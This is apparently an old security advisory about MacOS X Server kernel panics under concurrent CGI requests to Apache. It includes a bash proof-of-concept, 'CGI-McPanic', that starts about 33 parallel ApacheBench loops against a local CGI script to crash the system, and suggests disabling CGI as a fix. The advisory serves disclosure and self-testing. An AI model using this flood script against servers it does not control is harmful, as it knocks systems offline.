Vulnerability

    X system (cgi attack)

Affected

    MacOS

Description

    While  doing  performance  tests  with  different  web servers, ju
    found, that  MacOS X  Server running  apache crashed  under medium
    load, when calling CGI-scripts.  It displays "system panic" and  a
    stack trace with  ipc_task_init.  The  problem appears when  32 or
    more processes are doing GET-requests to a cgi script in a loop.

    This was reproducable on two different G3-Macs with 100%.  It
    doesn't matter, if the processes run local or remote (tried via
    LAN with 10 MBit).  Crashes appear after 30 seconds to a couple
    of minutes.

    It is supposed this is a  bug in the Mac kernel and  *not* limited
    to CGI scripts, however ju could find no other ways to trigger  it
    yet.  You can check your machine, using the apache benchmark  (ab,
    include on the MacOS  X server) with the  script at the end.   Any
    other program  to do  HTTP requests  in a  loop should  do.   This
    issue is published under:

        http://www.heise.de/ct/english/99/13/186/

    Script:

    #!/bin/bash
    #
    # CGI-McPanic: script to crash MacOS X with
    #              concurrent calls to a CGI-Script
    #
    # before use, do:
    #
    # chmod a+x /Local/Library/WebServer/CGI-Executables/test-cgi
    #
    # then call
    #
    # bash ./CGI-McPanic
    #

    NUMPROC=32
    i=0

    while [ $i -le $NUMPROC ]
    do
        i=$[$i + 1]
        ab -t 3600 http://localhost/cgi-bin/test-cgi &
    done

Solution

    Disabling CGI scripts might help for some time.